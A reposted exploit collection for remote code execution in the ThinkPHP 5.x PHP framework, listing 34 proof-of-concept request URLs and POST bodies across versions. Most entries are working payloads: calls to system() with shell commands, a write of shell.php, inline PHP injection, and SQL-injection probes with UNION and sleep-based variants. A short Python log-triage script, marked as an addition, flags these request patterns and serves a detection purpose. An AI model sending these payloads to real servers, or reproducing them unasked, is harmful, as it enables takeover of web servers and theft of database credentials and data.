  • think php 5.x

    # Exploit Title: thinkphp 5.X RCE
    # Date: 2019-1-14
    # Exploit Author: vr_system
    # Vendor Homepage: http://www.thinkphp.cn/
    # Software Link: http://www.thinkphp.cn/down.html
    # Version: 5.x
    # Tested on: windows 7/10
    # CVE : None
    
    https://github.com/SkyBlueEternal/thinkphp-RCE-POC-Collection
    
    1、https://blog.thinkphp.cn/869075
    2、https://blog.thinkphp.cn/910675
    
    POC:
    
    thinkphp 5.0.22
    1、http://192.168.1.1/thinkphp/public/?s=.|think\config/get&name=database.username
    2、http://192.168.1.1/thinkphp/public/?s=.|think\config/get&name=database.password
    3、http://url/to/thinkphp_5.0.22/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
    4、http://url/to/thinkphp_5.0.22/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
    
    thinkphp 5
    5、http://127.0.0.1/tp5/public/?s=index/\think\View/display&content=%22%3C?%3E%3C?php%20phpinfo();?%3E&data=1
    
    thinkphp 5.0.21
    6、http://localhost/thinkphp_5.0.21/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
    7、http://localhost/thinkphp_5.0.21/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
    
    thinkphp 5.1.*
    8、http://url/to/thinkphp5.1.29/?s=index/\think\Request/input&filter=phpinfo&data=1
    9、http://url/to/thinkphp5.1.29/?s=index/\think\Request/input&filter=system&data=cmd
    10、http://url/to/thinkphp5.1.29/?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=%3C?php%20phpinfo();?%3E
    11、http://url/to/thinkphp5.1.29/?s=index/\think\view\driver\Php/display&content=%3C?php%20phpinfo();?%3E
    12、http://url/to/thinkphp5.1.29/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
    13、http://url/to/thinkphp5.1.29/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd
    14、http://url/to/thinkphp5.1.29/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
    15、http://url/to/thinkphp5.1.29/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd
    
    Unknown version
    16、?s=index/\think\module/action/param1/${@phpinfo()}
    17、?s=index/\think\Module/Action/Param/${@phpinfo()}
    18、?s=index/\think/module/aciton/param1/${@print(THINK_VERSION)}
    19、index.php?s=/home/article/view_recent/name/1' 
    header = "X-Forwarded-For:1') and extractvalue(1, concat(0x5c,(select md5(233))))#"
    20、index.php?s=/home/shopcart/getPricetotal/tag/1%27
    21、index.php?s=/home/shopcart/getpriceNum/id/1%27
    22、index.php?s=/home/user/cut/id/1%27
    23、index.php?s=/home/service/index/id/1%27
    24、index.php?s=/home/pay/chongzhi/orderid/1%27
    25、index.php?s=/home/pay/index/orderid/1%27
    26、index.php?s=/home/order/complete/id/1%27
    27、index.php?s=/home/order/complete/id/1%27
    28、index.php?s=/home/order/detail/id/1%27
    29、index.php?s=/home/order/cancel/id/1%27
    30、index.php?s=/home/pay/index/orderid/1%27)%20UNION%20ALL%20SELECT%20md5(233)--+
    31、POST /index.php?s=/home/user/checkcode/ HTTP/1.1
    Content-Disposition: form-data; name="couponid"
    1') union select sleep('''+str(sleep_time)+''')#
    
    thinkphp 5.0.23 (full version), debug mode
    32、(post)public/index.php (data)_method=__construct&filter[]=system&server[REQUEST_METHOD]=touch%20/tmp/xxx
    
    thinkphp 5.0.23 (full version)
    33、(post)public/index.php?s=captcha (data) _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=ls -al
    
    thinkphp 5.0.10 (full version)
    34、(post)public/index.php?s=index/index/index (data)s=whoami&_method=__construct&method&filter[]=system
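
A log-triage sketch for the request shapes listed above, added here as an example and not part of the original PoC collection or of ThinkPHP itself. It percent-decodes the query string and form body and flags the recurring markers: a backslash in the `s` route, an `invokefunction` route, `_method` set to a magic method, a callable name in `function`/`filter`/`vars[0]`, and inline PHP in a parameter. The `classify` function, the rule names and the sample requests are constructed for this example.

```python
import re
from urllib.parse import parse_qsl

# Callable names that appear in the PoC list above; extend for your environment.
CALLABLES = {"system", "phpinfo", "call_user_func_array"}
# Parameters the listed requests use to carry a callable name.
CALLABLE_PARAMS = {"function", "filter", "filter[]", "vars[0]"}
# Inline PHP or ${@...} expression syntax inside a parameter value.
CODE_MARKERS = re.compile(r"<\?php|\$\{@", re.IGNORECASE)


def classify(target, body=""):
    """Return the sorted rule names (this example's own) a request triggers."""
    _, _, query = target.partition("?")
    # parse_qsl percent-decodes, so %5C and a literal backslash look the same.
    params = parse_qsl(query, keep_blank_values=True)
    params += parse_qsl(body, keep_blank_values=True)
    hits = set()
    for name, value in params:
        if name == "s" and "\\" in value:
            hits.add("namespace-in-route")     # class path placed in the route
        if name == "s" and value.lower().endswith("/invokefunction"):
            hits.add("invokefunction-route")
        if name == "_method" and value.startswith("__"):
            hits.add("magic-method-override")  # e.g. _method=__construct
        if name in CALLABLE_PARAMS and value.lower() in CALLABLES:
            hits.add("callable-in-param")
        if CODE_MARKERS.search(value):
            hits.add("php-code-in-param")
    return sorted(hits)


# Constructed requests shaped like the entries above, plus one benign request.
SAMPLES = [
    ("/public/?s=index/\\think\\app/invokefunction&function=call_user_func_array"
     "&vars[0]=phpinfo&vars[1][]=1", ""),
    ("/public/index.php?s=captcha", "_method=__construct&filter[]=system&method=get"),
    ("/public/?s=index/%5Cthink%5Cview%5Cdriver%5CPhp/display"
     "&content=%3C?php%20phpinfo();?%3E", ""),
    ("/index.php?s=index/index/hello&name=world", "_method=PUT"),
]

if __name__ == "__main__":
    for target, body in SAMPLES:
        print(classify(target, body) or ["clean"], target)
```

The `1%27` SQL-injection probes in entries 19 to 31 target application controllers rather than the framework router and are not covered by these rules.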
                
  • Original article: https://www.cnblogs.com/csnd/p/12291915.html